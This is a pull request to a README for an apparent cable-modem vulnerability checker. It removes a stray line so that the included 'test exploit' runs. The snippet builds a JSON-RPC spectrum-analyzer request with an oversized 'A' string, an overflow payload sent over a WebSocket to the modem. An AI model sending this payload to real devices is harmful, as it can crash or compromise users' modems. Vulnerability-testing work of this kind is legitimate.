### PR TITLE
remove errant code from README.md

### DIFF
--- a/README.md
+++ b/README.md
@@ -11,7 +11,6 @@ False negatives are possible via the script and you could be still be vulnerable
 exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' +',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
 console.log(exploit)
 
-console.log(testEqual(arr, newArr));
 
 var socket = new WebSocket("ws://192.168.100.1:8080/Frontend", 'rpc-frontend') //Or some other ip and port!!!
 


### PR DESCRIPTION
Not sure why `console.log(testEqual(arr, newArr));` was in this snippet, but it causes a ReferenceError and the test exploit fails to run.